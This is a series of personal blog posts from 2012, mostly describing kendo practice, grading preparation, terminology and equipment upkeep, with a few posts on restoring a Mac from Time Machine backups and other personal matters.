If we look at the word KATA in Japanese, its usually rendered as 形. However, the actual proper usage is 型. Both read the same, but what’s the difference? The former simply means “shape” or “form.” It describes the form that something is in, what it looks like. The second kanji, on the other hand, is the thing that is used to create items of the same shape, in other words, a cookie cutter like device. 

Kendo-no-kata can therefore be thought of as a kendo shaped cookie cutter and the students who practice it cookies (hopefully kendo shaped). Although non-Japanese readers might not be interested in the difference, I think that one of the main purposes of kata study is revealed: i.e. kata training was/is traditionally thought of as one of the main vehicles to teach people correct kendo.

Kendo kata help us study proper posture, maai as well as seme. By practicing sword fighting in a simulated and choreographed fashion we can focus completely on the intricacies of our body, of our movements and of the connection with our opponent. We also learn to judge distance, which helps us in our kendo.

Also, while kendo is an abstraction of true sword fighting, the kendo kata come closer to “real” fighting. Both the techniques used, as well as our bokken, help us understand the more serious side of our art, which entails life or death situations. They’re no kenjutsu of course, but the kata are absolutely a useful tool in understanding and learning kendo.

Some suggest there is also a spiritual side to kendo kata. In Inoue-sensei’s “Kendo Kata: essence and application” it is said that kata #1 through #3 show the progression of a kenshi in his studies. While at first he will win a fight by outright killing his opponent, he will then move on to win by only dismembering. Finally the kenshi will grow so far that he does not have to strike at all, winning by pure seme (kata #3). The UK kendo foundation has some further reading on this subject.

Preparation

Students new to kendo kata are advised to first observe a number of videos. The web is rife with kata videos, so we’ve taken the time to choose a number of good ones.

First up, there is a series of classic AJKF training videos (in Japanese). They are a bit dated, but they go over each kata in exquisite detail by filming from various angles and by zooming in on important parts. They also show examples of what not to do. Below are the first four kata, the other videos can be found under the YouTube account that posted these videos.

Another excellent video was made by Kendo World at the 2012 keiko-kai. While it only shows each kata once or twice, the demonstration is still very impressive.

Advanced reading

Should you be inclined to deeply study each kata in written form, then we heartily recommend Stephen Quinlan’s “Nihon Kendo no Kata & Kihon Bokuto Waza”. In this excellent and thorough document (free PDF) mr Quinlan analyzes each kata, which is accompanied by many photographs.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for shinsa

2012-11-14 22:07:00

In less than two weeks' time the NKR will host its semi-annual kendo grading exams, at the November central training. A number of our Renshinjuku students will take part in these examinations in order to test their current level. For many of them, this will be their first grading outside our own dojo, so we would like to take this opportunity to provide some information on the subject.

According to the NKR website, the requirements for kendo examinations are as follows:

The kata requirements differ per level. Ikkyu aspirants need to demonstrate kata #1 through #3, shodan will show #1 through #5, nidan goes up to #7 and anything above nidan will display all ten kata. Aside from above requirements, there are also some formalities to clear, such as minimum age and a few payments.

For the purpose of this document I will limit myself to the ikkyu grading as I have no experience at all with the higher levels.

Before the grading, or shinsa, even begins there is the matter of proper presentation. If a shiai (tournament) would be compared to a business meeting, then a shinsa would compare to a gala: at the former you are expected to dress and behave well, at the latter you are to act your very best! Apply proper personal care (nails clipped, hair properly kept, shaven if applicable) and make sure your equipment looks the part (proper maintenance, no loose ends, repairs where needed). Remove all dojo markings from your uniform and also remove your zekken. Make sure you wear your uniform and bogu neatly: no creases in the back, all himo at the same length, all himo lying flat, etc.

In kirikaeshi remember that it’s not a test of speed, but a test of skill. Show your best kirikaeshi by not rushing through it, but by paying attention to all details: footwork, timing, upswing through the center, downswing at an angle. Strike men at the proper angle and height. You are trying to strike ippon every time. As Heeren-sensei has pointed out repeatedly, your kirikaeshi should be performed in one kiai and breath.

Fighting in jitsugi should not be compared to shiai kendo, but instead is more akin to the jigeiko we do in class: it is not a fight for points. Instead, it is a fight to show and test skill. Do not be preoccupied with scoring points and with defending against your opponent. Focus on ensuring that the both of you show your best and high quality kendo. Show a connection between yourself and your opponent, show proper seme, show zanshin and show an understanding of your opponent's actions.

The kata examination should show a similar connection with your opponent. Kata are not a simple choreography, kata are a study in forms of a proper sword fight. If possible, take it even more seriously than jitsugi or jigeiko as the bokken represents a real blade. Make sure that you have memorized the forms beforehand, then lock eyes with your kata partner and commence the “dialogue” that each exercise is.

In all of the above examinations kiai is key. I was once told that “in the early stages of kendo, >95% of kendo is kiai”. Whether that is really true is another thing, but the essence of the matter is that kiai is important. It regulates your breathing, it vocalizes your intent and assertiveness, it impresses your opponent and it is part of yuko datotsu. Without kiai there is no spirit, and without spirit there is no kendo, only stick fighting.

At this level, the gakka (written exam) focuses on basic knowledge of kendo. Terminology, equipment knowledge, basic concepts as well as rules and safety are topics you may expect to find on the test. In preparation ensure that you are familiar with most of the terms in our dojo’s lexicon. The AUSKF also has an excellent gakka study guide, listing some of the common topics that you can be questioned on, including suggestions on what to study.

If you have questions about the upcoming shinsa, please feel free to ask your teachers. If you feel that you need feedback on your kendo in the next few weeks, please indicate this to your teacher.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finally a chance to test my backups

2012-11-13 21:46:00

Restoring from Time Machine

I've always been pretty "okay" about making backups. For years now I've been pulling drive images of both our Macbooks every month or two and both our systems run hourly backups to our NAS. Huzzah for Time Machine! Well, this weekend I got the chance to test our backups!

Having been bitten by the MMORPG bug after watching too much of SAO, I decided to save a lot of time (and money?) by closing the tab with worldofwarcraft.com and by reinstalling Warcraft 3. A few years back my brother-in-law Hans had given me the game for Christmas, so I still had the discs lying around. But! They're for PPC Macs only and obviously my Macbook has an Intel processor. Luckily you can download a Universal Binary version of the game through Battle.net (Blizzard's online store etc), after entering your CD keys. Which I promptly did.

Turns out that the whole Warcraft 3 game is a Universal Binary, except the bloody installer! WTF Blizzard?!

The solution is easy, yet stupid: install Snow Leopard (Mac OS 10.6) onto an external USB drive, which still has Rosetta (OS X's way to run PPC code on an Intel system). Everything went fine and I got the game installed. But when I tried to reboot to my Macbook's internal drive, I was greeted by the dreaded blinking question mark. Fudge! ( =_=)

The boot drive had gotten corrupted along the way. I have no clue whatsoever why, but it did. The only course of action, after I couldn't get the full disk encryption to open up, was to re-image the drive and restore from backups. The first part was easy: hook up my backup drive, boot from USB install stick and use Disk Utility to re-image. But then came the restore from Time Machine

As a Unix admin I was overthinking the whole process! I was afraid that, if I were to simply reconnect the Time Machine backup drive, the TM software would erase everything and overwrite it all. So instead I tried to use the good old Migration Assistant, which usually is a great idea. But no matter what I tried, it failed: MA wouldn't see my backups over the network and they wouldn't show up when connected locally over USB either. Turns out there are two good reasons for this:

  1. MA is meant to migrate from another system and because the backups were for this system, MA was ignoring them.
  2. TM backups made over LAN have a different structure than TM backups made onto a locally connected drive. 

Turns out that what I was afraid of, really is the right way. So here's the course of action that works:

  1. Re-image the drive, or do a clean install.
  2. Verify that the basic restore works properly.
  3. Temporarily enable the showing of hidden files in Finder (see the sketch after this list).
  4. Configure Time Machine to connect to your original backup location. 
  5. Start a backup, which will first do a full inventory of what's there.
  6. When the actual file transfer starts, cancel to save time and space.
  7. Enter Time Machine. Browse to your last good backup date+time.
  8. Select your home directory and select all directories you want, including Library.
  9. Press restore and watch in awe as the counter of files quickly rises.
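The Finder toggle hinted at in step 3 is the usual defaults incantation of that OS X era; consider this a sketch for 10.6/10.7, not gospel:

==============================================================

# Tell Finder to show hidden files, then restart Finder so the change takes effect:
defaults write com.apple.finder AppleShowAllFiles TRUE
killall Finder

# Flip it back when the restore is done:
defaults write com.apple.finder AppleShowAllFiles FALSE
killall Finder

==============================================================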

It could be that your restore borks once or twice, because a file is being locked by a running process. Most likely this is a cache in Library, or a plist locked by iCloud syncing. You could temporarily turn off all syncs and remove the offending files.

In my case, over 126,000 files were restored, ringing in at over 32GB.


kilala.nl tags: , ,

View or add comments (curr. 0)

Sword Art Online: as kendoka this irks me

2012-11-10 17:16:00

Kendo mistake in SAO

Over the past few weeks I've been following one of 2012's hit anime: Sword Art Online (trailer). I love the art work, the music, the character designs, the plot and the character development. It really is an awesomely engaging show.

It is because I love this show so much that the above screencap irks me so! They put so much effort into the show, but then make such a basic mistake! If Suguha (Kazuto's cousin) is such an accomplished kendoka, who's been practicing kendo for over ten years, then she would not put a shinai with its tip down to the ground! WTF A-1?! 

ヽ(#`Д´)ノ


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Wow, a great night of kendo

2012-11-07 07:44:00

Last night turned out to be excellent!

What with the bad weather I'd left home a bit early so I'd be in time to pick up Charl from the P+R at Diemen. I arrived in time, but his bus didn't. Running almost half an hour late we stumbled into the dojo while almost everyone was already dressed. I was afraid we wouldn't be able to join in, but luckily we were simply welcomed in. It certainly was one of my fastest attempts at getting dressed ;)

Having missed the running, we joined in with the stretches and suburi. In the middle of stretching I was approached by Bert-sensei, to quickly talk about getting some replacement take for my shinai (which broke recently) and the ones I'm repairing for the dojo. He indicated that I could grab a shinai of my liking from the spares box, to take apart. Awesome! He also gave me a koban shinai (a practice sword with an oval handle) as a present. Double awesome! ( ^_^)/

During seiretsu, Heeren-sensei indicated that we will be using the next few weeks to prepare for the NKR shinsa (25th of november). This means that we will not be focusing on shiai kendo, but on clean and proper kendo. Focal points for the next few weeks are seme, ki-ken-tai ichi, and zanshin. Pay close attention to your posture, to your footwork, to your strikes, so you can demonstrate your ability at its best.

In accordance with our study goals, today's class focused on kihon practice just like last week. Using the motodachi system we practiced kirikaeshi, oki men, chisai men, oki kote-men, chisai kote-men, oki dou and repetitions of men, kote-men, dou, kote-men-dou. Students were encouraged to display proper kiai and to pay attention to the timing of their footwork, which should match their strikes.

Funny thing: class started out in mawari geiko style (rotating the whole group), but was switched to motodachi style right before I was due to rotate to the shidachi side. In a later chat with Heeren-sensei he told me he was very curious how I would deal with that situation, knowing about my problems with breathing and panic. Whenever I'm on the shidachi side I bow out pretty early, but now that I was on the motodachi side he knew I was stuck: I have a responsibility to the people on the shidachi side, because without me in my spot those people cannot practice. As Marli said when I explained this: "Booooy, he's got you pegged! He knows exactly how to get to you!" and she's right :)

Well, it worked: the added responsibility meant that I finished class just about completely and I didn't bow out from kihon practice. I am very happy that I pushed through for the shidachi I practiced with and I learned a thing or two. Sure I got tired quickly, but that was solved by foregoing my own practice two or three times: let shidachi practice, then skip my own drill to catch my breath.

Heeren-sensei took a little time to demonstrate that oki dou starts out looking like a normal men strike. You start going for men and when your opponent raises his shinai to parry, you bring your shinai to your shoulder (or sometimes higher) and strike dou. As always it is important to:

Heeren-sensei indicated that, to practice this dou strike, it is best that motodachi does not open up dou beforehand but that motodachi should only start opening when shidachi moves to strike men. He also suggested that, when paired against someone considerably shorter than yourself, you can slightly lower your posture by sinking down on your legs a bit.

Kihon practice was followed by fifteen minutes of jigeiko and of course kirikaeshi. After two rounds of geiko (thank you Charl, thank you mr Goto) my breathing got the better of me and I had to bow out. After a short recuperation I joined the bogu-less group to practice some oki kote-men and chisai kote-men with Raoul-sempai. I'm very happy that Raoul saw improvement in my kendo since the last time I'd practiced with him. He indicated that my right hand was still a bit too tense and thus too slow, but in general he saw improvements!

After class, Heeren-sensei reiterated that we need to practice proper and good kendo for the examinations. He also informed us that, starting next Saturday, class will include kata geiko which is also needed to prepare for the exams. He advised everybody to prepare by researching the kata they need to know and to watch a few videos. He also asked the kendoka with kata experience to provide guidance to their classmates.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Coactive coaching: DO-DONT structure

2012-11-05 07:35:00

Don't bark, do restrain yourself

Recently I started a coaching process with Rockover Coaching (about which I'll write more later). In our third fruitful session I was assigned a bit of homework: make a structure for use in the office, to remind me of some of my personal DOs and DONTs.

In this case the DONT is my at-times hyperactive approach to communicating: too fast, not letting people come to their conclusions, sticking my nose in and generally forcing an opinion. The DO is the polar opposite of this, which I have already set as a goal for 2012: enryo, self-restraint, calmness and respect. The intention of the structure is to put something in place that inherently reminds me of these DOs and DONTs at any given time, so I chose to hang up a poster at my desk.

Looking for graphics that trigger the DO and DONT in my mind, the DO is obviously represented by the kanji for the word "enryo" (as discussed before). When it came to the DONT one thing immediately popped into my head: Dexter's Laboratory's talking dog. The overly excited, busybusy, shouty dog who yelps for attention exclaiming that "I FOUND THE THING! THE THING! I GOT THE THING!" Or that's how it went in Dutch; in English apparently it's "found you", but hey.

So... The above poster is what I whipped up in a few minutes and as per this blogpost it's delivered to my coach. There you go sir! ;)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Oh iPhoto, you crazy!

2012-11-04 11:12:00

iPhoto, you crazy

I've fought with iPhoto before and by now I'm not nearly as happy with it as I used to be. Could be that it's getting wonky now that we have 16,000+ photos in there, but who knows. The screenshot above was just the latest bout of craziness :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: seiretsu and dojo

2012-10-28 22:08:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with commands from the line-up. We will also provide an explanation of dojo layout.

As noisy and violent as kendo class may be, there are two moments that form a stark contrast: at the beginning and end of class all students line up to thank their classmates and teachers and to meditate. The dojo is plunged into quiet, while students prepare their armor and ready themselves. Usually it’s the highest ranking student (not the sensei themselves) who calls out the following commands.

The preceding paragraphs have already mentioned a lot of terms describing parts of the dojo. Below is a drawing of the Amstelveen dojo, with the most important terms shown in the right location. Both the drawing and the lexicon below could only have been made because of Dillon Lin’s excellent article on dojo layout.

The following list is ordered from the entrance, towards the highest and most important position in the room.
A few other elements often seen in dojo, but not in ours, are:

Our Amstelveen dojo may have neither of these two, but one could argue that the flag replaces the kamidana. Our flag is there to remind us of the dojo motto and to act as a reminder of the required frame of mind.

As always, I would like to thank Zicarlo for reviewing this article.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo class and 'career' planning

2012-10-28 08:45:00

Lately the teachers at Renshinjuku kendo dojo have been pushing the students to challenge themselves. They're getting as many students as possible to enroll in the Dutch national championships and they also want students to prepare for their exams. Sadly I can't join the NK (due to planning) and I don't feel I'm ready to take the exams either. Kris-fukushou confirmed this to Marli, when they were having a chat while I was dressing: if I were to go for ikkyu now I'd definitely not make the grade, but if I work hard I can definitely give it a good shot next winter. And I will!

I'll discuss the matter with Heeren-sensei, Loyer-sensei and both Hillen and Kris, to see what they think I need to work on the most.

Saturday's class got off to a slow start. People came in a bit too late, so we only got things on the road by 0925. In the end, turnout was not bad with eight guys in bogu and about a dozen beginners without armor. We started with the usual warming-up, after which we quickly went into seiretsu. While Loyer-sensei took the newest beginners aside, the novices joined the more advanced group for kihon practice. The guys in bogu acted as motodachi, while the novices practiced oki-men and oki-kote-men.

Then, waza practice! We started with basic kirikaeshi, men and kote-men drills, then quickly moved on to more advanced material: double hiki-men, hiki-kote-men and hiki-men-kote-do. As Kris and Hillen explained, the object is to push the envelope on our grasp of distance and footwork. In these drills it's no use to over-think your actions as a lot of it comes down to feeling what you're doing. You do an exercise, then you very quickly analyse your actions and then go on with another drill. The basics come down to:

  1. Start in taiatari.
  2. Your left foot moves backwards while your shinai moves back just enough to get a clear shot.
  3. You fumikomi when striking and land about a foot behind where you started.
  4. The second strike is made with fumikomi in the exact same spot.
  5. The third strike is made in the same spot, with the fumikomi launching you backwards.

As was said, if you overthink this then you'll just get stuck as I did. I tried to do the exercises in slow motion, but then everything fell apart. Instead, try it at 0.8 or really just 1.0 of the desired speed. 

The latter part of practice was spent on reacting to motodachi's men and kote attacks. We were free to try any techniques we like, so I focused on debana-kote, ai-kote-men and kaeshi-men. For those people joining the NK next week, we did short practice shiai. I fought Tiamat-sempai.

Individual pointers I received from my teachers:

Class was closed with some reminders from the teachers.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: warmup and suburi

2012-10-24 22:09:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with words and phrases from warming up.

We will start with a list of common stretching positions, which you will hear every week when training in Amstelveen as large parts of class are conducted in Japanese. Funnily enough, in Japanese “stretching” is a loanword from English: ストレッチ (su-to-re-chi).

After stretching, we proceed to suburi (素振り), lit. “practice swing”, from 素 (plain, natural) and 振り (swing). You will often also hear this called “empty strikes” as we are performing strikes without hitting any target. There are many kinds of suburi, where the following are the ones most often performed in our dojo.

As part of the instructions for suburi you will often hear additional commands.
  • Kamae to (構えと) Stand in chudan no kamae.
  • Mae & ushiromae (前 & 後ろ前) Respectively forwards and backwards. You will hear these in exercises like the square/box or cross.
  • Hidari & migi (左 & 右) Respectively left and right. You will hear these in exercises that incorporate sayu-men strikes, like the aforementioned square/box/cross.
  • Ni-ju pon, san-ju pon, yon-ju pon etc. Literally “20 count”, “30 count”, “40 count”. Basically, the amount of suburi you are expected to do. It is suggested that you learn to count to at least 100 in Japanese.

With many thanks to Kiwa-sempai for providing the list of stretching commands and to Zicarlo for providing further help with kanji for the missing terms.


kilala.nl tags: , ,

View or add comments (curr. 0)

There's something you don't see every day

2012-10-18 15:54:00

A molten sakigomu

I'd invited some of my classmates over for kendo equipment maintenance and last night Sander joined me. I enjoy these evenings, not just because I like fixing equipment, but they're also a great chance to just shoot the breeze with people I normally only talk to in the dressing room. Well, that or we're bashing each others' heads in ;)

Before Sander's arrival I'd already sorted through Ton-sensei's bit bucket to see what's available. I had to get rid of a bunch of tsukagawa (handle covers) because they were covered in mold. Ditto for some of the sakigawa (tip cover). I quickly put everything into their own bags, to keep things tidy.

We got started on our own shinai, after which we moved on to a bunch of loaner shinai from our dojo. My own shinai had a broken take, after last Tuesday's horrible night. Luckily the take was recoverable after getting rid of the split-off piece. Obviously I'll let the guys at the dojo check it over first, to make sure I'm not putting anyone in danger. Sander's shinai were still in good condition, so he was done pretty quickly.

Then! On to the loaners! While Sander worked on one of the adult's versions, I patched up the two kids' shinai. The first one went pretty quickly, but the second one provided a surprise! See the picture above: the sakigomu (a plastic or rubber stopper in the tip) had melted! I've never seen that before! The molten rubber had cemented the take together and the sakigawa was also hard to remove. In the picture above I've outlined what was left of the rubber in white. The part that sticks out on top was completely gone! :D I guess someone left that thing lying right next to a heater or something. I managed to clean everything up nicely with some turpentine, but now I need to dig through the bit bucket to find another sakigawa in the right size. 

I'm very happy for Sander, who completed his very first complete tear-down and build-up last night! He completely disassembled the loaner shinai, replaced one of the take (too worn down) and he even re-tied the sakigawa to a new tsuru. Great job! That knot is a bit of a challenge! I know I'm keeping one of the worn, cut-off sakigawa for reference ;)


kilala.nl tags: ,

View or add comments (curr. 2)

That didn't go too well (some good stuff as well)

2012-10-17 07:44:00

All of yesterday I'd been feeling crappy, so I wasn't altogether too confident going to kendo. It was nice going together with Herman and Charl though :)

As I'd feared I had to bow out during kihon practice, because I was soo tense and out of breath that I'd keel over if I didn't. I don't know what was up yesterday, but all my muscles are/were tight as heck and my breathing patterns were a complete mess. Meh. So I quickly joined Roelof-sensei and Herman at the beginners' side. There I practiced oki-men, sayu-men and the semete-men movements we've been working on for the past weeks.

Pointers that I was given during class:

During class I noticed that I'd cracked one of the take on my newer shinai. ( ;_;) I guess Roelof-sensei sure had a point when he said I was hitting too hard. I'll see if I can fix that tonight, otherwise I'll find another solution.

EDIT:
When it comes to good stuff (it's not all bad), I've been writing a lot for the new Renshinjuku kendo dojo website. Aside from summaries of the classes I attend and some news posts about kendo events, I have also started a series of lexicographical articles. I know from experience that all the Japanese terms and phrases can be confusing for beginners, which is why I want to take the time to explain them. Of course there's the dictionary list compiled by our teachers, but that only provides translations and little explanation.

First up in the series is an explanation of the various types of geiko ("training"). Next up, to be published on Sunday, is an explanation of all the commands used during warming-up and the various types of suburi. In the near future I'll also write about the commands in seiretsu (plus some background on dojo layout) and about our equipment.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Kendo lexicon: keiko

2012-10-14 22:10:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We’ll start off this series of lexicon posts with the types of keiko.

The word keiko itself means “practice”, “study” or “training” and consists of two kanji, 稽 (kei, to think/consider) and 古 (ko, old). One could say that everything we do in the dojo is keiko.

With many thanks to Zicarlo for advising on the additional meaning of various kanji.


kilala.nl tags: , ,

View or add comments (curr. 0)

Hillen is back!

2012-10-13 12:51:00

Today started with a pleasant surprise: Hillen has returned to join Loyer-sensei and Kris-fukushou in teaching us. We also had a lovely, large group of 21 today with two fresh faces and four guys still working their way to wearing a uniform. With eight or nine guys in bogu it might not be much, but for Almere that's a decent show :)

After kata practice and warming up we quickly proceeded with kihon practice. Loyer-sensei took the newbies aside for the basics, while the beginners practiced men, kote-men and kote-men-do on motodachi in bogu. It gives me great pleasure to see that, in mawari geiko, the fundamentals of reiho are now falling into place. Beginners and advanced folks alike take the appropriate approach: bow (onegai shimasu), step into kamae, do your exercise, back into kamae, sheathe your shinai and step back, bow, then bow again when everybody's done (arigatou gozaimashita) and kotai towards the next partner.

The beginners then joined Ton-sensei with the newbies for further kihon training, while those in bogu proceeded with waza. Chiisai kote-men, kote kote-men, men debana-kote, men hiki-men ai-men and men kaeshi-do. Each of these exercises was performed two or three times and in between were one-minute rounds of jigeiko to further practice.

In all these exercises, Kris-fukushou reminded us of the importance of building tension, of proper footwork and of feeling the proper distance and chance to make your strike. Try to use different approaches in stepping in: sometimes edge your way in sneakily, sometimes boldly step and strike. In debana-kote don't simply step aside, but first step in when striking; then move aside. In both debana-kote and hiki-men keep your movements tiny, else you are simply too slow. With all these exercises it is imperative that motodachi give his best attack! Without a proper chiisai-men, you cannot practice a proper kaeshi-do! So don't just try and whack something, make it your best strike!

Class was closed with three rounds of uchikomi geiko (third round was kakari geiko for those in bogu). Everyone was pitted against Kris-fukushou, Hillen-sensei, Raoul-sempai and Charl-sempai.

At the end of class all three teachers had some closing remarks.

Pointers that I received individually:


kilala.nl tags: , ,

View or add comments (curr. 0)

Back to training

2012-10-10 08:24:00

In the absence of Heeren-sensei, class was led by Tsuyuguchi-sensei with Ran-sempai handling the translations. And with Kiwa-sempai gone for the day, Loek-sempai took care of the warming-up. After some initial confusion about the day's structure (no motodachi system, yes motodachi system, semi-motodachi system, beginners along with the bogu group) we got settled into some hard work! Who'd have thought? Even classes in Amstelveen can get a little disorganized :)

Emphasis was placed on basics: kirikaeshi, oki-men, hayai-men, hayai kote-men, men-hiki-men, men-hiki-kote and men-hiki-do. Tsuyuguchi-sensei impressed upon us the need for:

After a further twenty minutes of jigeiko, class was closed with parting remarks by Roelof-sensei.

During practice I also received some personal advice.

Class was hard work and I enjoyed it a lot. I brought along Herman and Charl from the Almere dojo, which was a nice change :)


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS Users Group: an ending

2012-10-08 19:46:00

BoKS Users Group website

Almost two years ago I let go of a volunteer project that I'd started, Open Coffee Almere. The project had outgrown me and in order to prosper needed someone else in charge. So I passed the project on and stepped back completely.

Another project that was started at roughly the same time, but which never really took off is the BoKS Users Group. Meant to unite FoxT BoKS administrators across the globe in order to share knowledge, it was mostly me trying to push, pull and shove a cart of rocks. A lot of people said it was a great idea and they'd love to join, or to provide input or to benefit from it. But none of that ever really happened. 

And then even I stopped pushing updates to the website. Hence I've decided to pull all the content back into my own website and to shutter the site. I'll probably also give admin rights of the LinkedIn group to FoxT and that's that.


kilala.nl tags: , ,

View or add comments (curr. 2)

Fumetsu Cup 2012

2012-10-01 20:46:00

Thomas standing in line

Looking at the picture Peter-sempai shot of me, waiting in line for the shinai check, gave me a sudden glimpse into my future. Will I look like Roelof-sensei in thirty years?

Yesterday I attended the 2012 Fumetsu Cup kendo tournament in Vlaardingen. A few weeks back I'd indicated that I would really like to compete and Marli was sweet enough to accommodate me. While I gallivanted off to the Rotterdam area, she spent her Sunday with our daughter. She's awesome <3

The Fumetsu Cup, as described by the NKR in the invitation: "The Fumetsu Cup is the yearly held surprise tournament in which all participants are randomly divided into teams of three persons. With their team they will compete for the cup. Teams will be captained by an experienced kendoka."

It's great fun because you get to meet people you normally might not and you're driven way out of your comfort zone. Instead of fighting with kendoka from Renshinjuku, my team was pitted against one of them. Unfortunately the last sentence of the description wasn't true for my team, as all three of us were mudansha: combined we had about five to six years of experience and none of us even had our ikkyu. Hence we were knocked out of the tournament after our three fights in the first round. Oh well :) I enjoyed teaming up with Kerstin (from Museido in Amsterdam) and Erik (from Shinbukan in Groningen); they were great people to meet and I learned from them in the short time we spent together.

In my three fights I matched up against Laurens from Suirankan, Ms Cha who at one point used to be with the UK Hizen dojo and Wim from Shinbukan. I really should have done a short practice round before the actual matches because I had the same problem that Kerstin had described: in the first fight I'm still "asleep", not properly alert. 

Afterwards I asked some of my sempai for their opinion on how I'd performed.

As I'd told Nick last Saturday, my goal for the day was to at least show some proper kendo. I didn't want to make the same stupid mistakes as last time and I wanted to last at least a full, real match. Aside from the fight against Laurens I'm satisfied in that regard. Plenty to learn though! :) My thoughts were all over the place, I was focusing on too many things and yes, I kept on dancing. Always dancing :(

EDIT:

I've had a chat with Wim and he remarked that I showed good kiai and that I was plenty greedy. I'll view the former as a good thing, but the latter could swing either way. I could have been too greedy, like last time, or I could have shown proper assertiveness.

While walking to the office this morning I did have a realization: one of the worst things I was doing, was not stonewalling my opponents' attacks. Either I sidestepped and counter attacked, or I kept moving backwards to evade. Instead, I should receive their attacks in place and counter immediately.


kilala.nl tags: , ,

View or add comments (curr. 2)

Tournament prep in Almere

2012-09-29 13:32:00

I don't know why, but our group was a bit smaller today. Six in bogu, five or six without. I guess a lot of folks are off sick. After kata and warming up we proceeded with footwork practice. 

As part of balance exercises we did lunges. 

In all of these exercises, if you feel imbalanced and tend to wobble or keel over, then your footwork is too narrow. When lunging, keep your feet at kamae-width and sink deep. Hold a straight back.

After this followed laps of suriashi around the hall.

Loyer-sensei and Kris-fukushou inform us that the problems are twofold. For one, most of us aren't properly launching ourselves with the left foot. Either we're not kicking hard enough, or we're kicking backwards after launching. Many of us also lift the right foot way too high when lunging forward. Not only does this clearly signal your intentions to your opponent, but it also slows you down. As Kris pointed out, many of us don't stomp our right foot for forward speed but come to a full stop, because we kick downward or even forward.

While the beginners renewed their focus on kirikaeshi and kihon, we practiced a few waza.

When attacking, imagine your goal to be two meters behind your opponent! Don't strike and immediately dash aside. Worse yet, don't immediately turn towards him! Rush through them and if they get in the way, go into taiatari. Don't hold your hands too high, as they'll simply topple you. "Tsuba into the mouth", as they say.

Finally, because tomorrow is a tournament day: the practice shiai! I joined Nick and Hudaifa, against Charel, Jeroen and Sander. After each round, both kenshi quickly received some pointers on their own kendo from Kris and Loyer-sensei. In my case:

Because we don't have much experience with tourneys we also went over the basic etiquette. Both teams decide the order of kenshi, one through five (or three as is the case tomorrow). Only the first kenshi will be wearing his men from the start. The teams greet each other, then retreat to their side of the court. Everyone except the first sits down and pays attention to the fights. Numbers two and three will start putting on their men. Four and five will follow later. Then, each participant will continue as follows.

  1. Step into the shiaijo. Step to a position from which you can reach your starting line with three paces. 
  2. Bow to your opponent.
  3. Three steps to your line, right foot on the line. Not over, not in front, on the line. In your steps, draw your shinai and go into sonkyo.
  4. Do not rise until the shinpan give the command "Hajime!".
  5. Return to your line when a point has been made.
  6. If something is wrong, raise your hand. Both kenshi return to their line, while the shinpan find out what is up. If you need to adjust your gear, both kenshi step back and the other waits in sonkyo while you fix whatever is wrong.
  7. When the match has been won return to your line. Sonkyo and put your shinai away.
  8. Five steps back. Bow. Step out of the shiaijo backwards and take your seat. 

The Nanseikan kendo dojo has a more complete article on the subject of shiai etiquette.


kilala.nl tags: , ,

View or add comments (curr. 0)

On the importance of upkeep

2012-09-27 20:23:00

After last week's lecture on the importance of shinai maintenance you would think that people would actually take note. But no, sadly they don't. Last Saturday I spent a good ten minutes inspecting and fixing one of our youngest members' shinai, despite having shown him how to do it and providing him with a printed booklet with instructions. He has two shinai at his disposal: the first one was in shreds and the second was only a little bit splintered. So I took the second one outside with my toolkit, also forbidding him to use the other one until it was fixed.

Sadly, many of the other members show only little more interest in maintenance. I have tried a number of ways to get them more involved, but without wanting to overstep my station I haven't had much success. The biggest "win" so far was when four of us had a great evening, doing maintenance on all of our equipment :) I'd love to repeat that sometime soon. 

For now I'll do upkeep tonight, because I've got a tournament coming up! ( ^_^)

Sunday I'll be joining five other guys from Renshinjuku at the Fumetsu Cup tournament. I won't be in a team with them, as the Fumetsu Cup pits randomly selected teams against each other. Who knows who'll be your teammate?! :D Of course, if I want to compete my shinai need to be in tiptop condition.

Last Tuesday we had a mandatory inspection at Renshinjuku Amstelveen and one of my shinai was sent back because of a tiny splinter that was just starting. A quick repair later it was accepted, but I'll definitely go over both shinai with a fine toothed comb :) Ironically the shinai I loaned to Jeroen-sempai had no issues in QA.


kilala.nl tags: , ,

View or add comments (curr. 0)

A session dedicated to seme-to-men

2012-09-26 20:43:00

Seme to men

Last night's class was invigorating and I went home feeling energized and ready for two more rounds of keiko! ( ^_^) Jeroen-sempai, who joined me for the first time, came away with similar feelings.

Class was started in the usual fashion, with stretching, running and suburi. In hayasuburi, Heeren-sensei admonished some of the kenshi (definitely me!) for not bringing the shinai back against the buttocks in every single suburi round, as that is a helping hand in figuring out whether your swings are going down the center line. So thirty more hayasuburi it was! :D

The first ten to fifteen minutes of the day's lesson were fully spent on explanation. The crowd gathered around Heeren-sensei and Kiwa-sempai who demonstrated a number of things.

They also took a lot of time explaining the physical aspects of seme to men ("pressure and men"). An excellent read on seme would be Stephen Quinlan's "The fundamental theorem of kendo?". Funny how mr Quinlan's writings keep popping up in my studies!

In this particular exercise we would be stepping in deep, so deep as to almost pierce our opponent's navel. While stepping in, our shinai would go through the center (do not push your opponent's shinai aside), thus sliding on top of or over the opponent's shinai. Our kensen will be held low, as to disappear from our opponent's view. From this position, we would proceed to strike oki-men. The rough sketches above show this: step in deep, not just a little bit, and keep the kensen low, not high.

